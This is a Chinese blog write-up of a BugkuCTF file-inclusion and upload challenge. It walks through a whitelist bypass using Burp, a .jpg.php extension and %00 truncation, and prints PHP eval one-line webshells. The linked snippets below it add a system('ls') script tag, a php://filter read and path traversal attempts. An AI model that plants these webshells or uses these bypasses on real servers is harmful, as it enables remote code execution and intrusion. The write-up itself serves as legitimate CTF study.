BugkuCTF-WEB-文件包含2

最新推荐文章于 2024-07-30 14:59:55 发布
最新推荐文章于 2024-07-30 14:59:55 发布
阅读量1.1k 收藏 8
点赞数 1
分类专栏: CTF 渗透测试 漏洞验证 文章标签: 文件包含 文件上传 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38603541/article/details/99434370
版权
CTF 同时被 3 个专栏收录
32 篇文章 3 订阅
订阅专栏
渗透测试
8 篇文章 1 订阅
订阅专栏
漏洞验证
7 篇文章 0 订阅
订阅专栏

解题链接:http://123.206.31.85:49166

打开题目链接,发现url变成了http://123.206.31.85:49166/index.php?file=hello.php很明显的文件包含字眼file,之后我们来看一下网页源代码

我们可以发现网页源代码里面有一个event,不过没什么用,我们在源代码最上方可以看到一行注释写着upload.php,我们尝试访问一下upload.php

访问到upload.php之后页面出现了文件上传的样式,从页面信息可以看出,网站通过白名单的方式限制了上传文件的类型,只能上传jpg、gif、png格式的图片文件,此时我们需要绕过文件格式检测,上传一个我们的文件。这里我使用了php的一个图片一句话木马文件。

思路:使用burpsuite进行抓包,构造图片木马文件,然后通过burpsuite修改文件类型进行绕过检测,最后使用菜刀进行连接获取flag。

修改之后点击Forward重传数据包,此时回到浏览器页面发现上传失败

说明不能通过仅仅修改文件类型进行绕过,那现在该怎么办呢?既然只要上传图片,那么我么可以构造图片木马进行文件上传,使用如下图方式进行制作木马文件:

写好语句之后保存,然后我们修改一下文件的扩展名为 .jpg.php,现在再使用burpsuite进行抓包然后重传数据包,使用%00截断。

Forward重传数据包之后,我们可以看到页面回显信息提示,文件上传成功,并返回了一个文件名,我们来访问一下这个文件名

访问文件名之后,页面信息空白,说明木马可以执行,接下来我们使用菜刀来连接一下

添加连接之后我们可以看到我们所上传文件的位置,另外最重要的是这里有一个类似隐藏着flag的txt文件,我们来打开它

打开之后就是我们要的flag了。

总结:在CTFweb题中关于文件类的题目经常会是这种文件上传漏送和文件包含漏洞一起使用,这时候就还是要合理利用方法,避免像我这样兜兜转转一大圈然后最后使用简单方法一样能做的出来。另外在这个题目中,关于使用的木马也是有要求的,不能使用最普遍使用的那个一句话木马进行图片木马的制作,像<?php @eval($_POST['pass']);?> 这个木马是没法办用的,也不是说没办法用,可以用但是最后菜刀连接不上我们的木马文件,原因是,在解析过程中<php都被过滤掉了,这就很麻烦,这是用我们换一种木马的写法:<?=eval($_POST['shell']);这个木马最后是可以连接的。

烟雨天青色
关注
专栏目录
BugKuCTF套路满满的题--------文件包含2
qq_42133828的博客
12-24 1697
首先讲一下这道题的思路,文件包含,什么是文件包含?其实简单来说就是通过一个文件传入参数(构造语句)去访问另一个文件,从而得到你所想要的东西。 然而,这道题,除了文件包含的知识。还涉及到了文件上传的知识。毕竟,这两者总是相互存在在。。。。。 好了,接下来,开始解题: 首先进入的界面是一个欢迎界面,看URL里的参数得有一个参数file,查看源码可得有upload.php这个文件存在,那么改一下f...
Bugku Web CTF-文件包含2
No Title
12-31 457
Bugku Web CTF-文件包含2 打开是一个页面,题目提示是文件包含,url的格式也很典型: http://123.206.31.85:49166/index.php?file=hello.php 尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass,然后页面显示大字NA...
bugku ctf 文件包含2
qq_42777804的博客
08-08 4066
首先进去网站 发现是这么个东西       没有思路   只好右键查看源码   或 F12 发现注释文件upload.php,访问下来到文件上传页面 访问后发现     上传图片界面。。。 之后有两种方法!!!!!!!!!   1.     新建文档写入  &lt;script language=php&gt;system("ls")&lt;/script&gt;...
BUGKU-WEB-文件包含
最新发布
m0_52484587的博客
07-30 714
convert.base64-encode:是一个过滤器,看到encode可以知道这是一个加密的过滤,那自然就有convert.base64-decode,解密了。可以看到,说是这个参数可以不选,在PHP伪协议中,read是一个用于读取文件内容的操作符。如果不进行 base64 编码传入,index.php 就会直接执行,我们就看不到文件中的内容了。这样做的好处就是如果不进行编码,文件包含后就不会有输出结果,而是当做php文件执行了,而通过编码后则可以读取文件源码。read操作符将返回指定长度的文件内容。
bugku-文件包含2(文件包含漏洞)
烟敛寒林的博客
11-09 2719
本文介绍三种方法,还会讲到这道题菜刀的连接。 进入题目页面,没有什么特别的,只能右键查看源代码,发现提示需要跳转到 upload.php上传页面 方法一: ①新建一个txt文件写入 <script language=php>system("ls")</script> 后另存为 jpg 格式 ②选择浏览上传文件 ③访问 保存进去的文...
bugku 文件包含2
stantic的博客
04-12 2410
页面很正常,url里面有一个file参数,看一下源码 有一个upload.php看一下 文件上传,题目是文件包含,就想到了前面做的的上传图片马,用文件包含连接,试一试 不知到哪里出问题了,看一下上传的内容 <?和?>被换成了_,那就试一试没有<>?的一句话, <script language=php>eval($_POST['shell']);</script> 再做一个图片马上传 这题就是文件包含文件上传的合作...
Bugku web——文件包含2
qq_40481505的博客
10-16 948
打开链接,看到链接形式为file=hello.php,因此首先尝试php文件包含 php://filter/read=convert.base64-encode/resource/hello.php 报错 php://input 报错 file://var/www/hello.php 没有报错,但也没有输出 data: text/plain,<?php echo 123; ?> ...
BugkuCTF-WEB文件上传
am_03的博客
09-08 1903
启动场景 发现是文件上传 只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个: 一个是http head里的Content-Type: multipart/form-data; 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data (其t为大写) Multipart里的部分字母
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 1970
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
BugkuCTF-WEB-本地包含
Jaychouzzk
11-15 538
题目提示,需要将flag.php包含进去才可以得到flag 百度了一下$_REQUEST函数,发现易存在sql漏洞和变量漏洞覆盖 第二句话要获得hello的值,由于hello为’hello’,所以无论在url栏中对hello赋任何值,都会全盘接受,其中var_dump()是将变量a打印到界面中,在根据eval函数的特性(计算后面括号中的表达式) SO——   (1)a变量由$_REQU...
CTF平台题库writeup(二)--BugKuCTF-WEB(部分)
渗透、攻防、CTF、编程
06-26 4193
web2 flag在源码的注释里 计算器 改一下text文本框的最大输入位数>1即可 web基础$_GET GET方式传参即可 web基础$_POST post方式传参即可 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 这题要求传参num不能是数字,而且num=1,一开始没有什么思路,认为是弱类型的绕过,传了true进去,发现无效,问
[bugku]-文件包含2
weixin_52116519的博客
03-31 1037
考点:通过文件包含的方式读取其他目录下的文件按 1、查看源码,发现hint 2、文件上传点 3、上传1.png文件,抓包,修改内容为一句话木马 4、访问上传文件名,发现有过滤 5、绕过过滤,上传一句话木马 6、访问上传文件名,输出a,说明上传成功。接着getshell即可。 ...
bugkuctf 文件包含2 writeup
wuerror的博客
08-07 1574
  首先看网页源代码,发现 访问upload.php,进入上传页面。     要求上传图片,开始构造一句话图片马。因为初学,一句话不太熟只知道 &lt;?php @eval($_post[a]);?&gt;   把这句话加在图片(改为txt格式)的最后,再改回jpg。上传之后访问该图的存储路径,发现post数据没有反应。显示出来的我的"一句话"语句好像两头被转义了。想了好久不知道怎么办,...
bugku-web-文件包含2
qq_75121443的博客
04-14 399
啧啧啧,怎么说呢,这题出的挺诡异的,本来是考文件包含,结果不伦不类。这里试探结束,开始配合文件包含漏洞,上传图片。上传一个脚本,将图片后缀改为php。这就很离谱,上传的一句话居然用不了。提示是这个文件,访问这个文件。测试后后台为linux系统。各种绕过手法使用后无法绕过。上传成功,文件包含后发现。看到了第一行有一个注释。
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟雨天青色

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值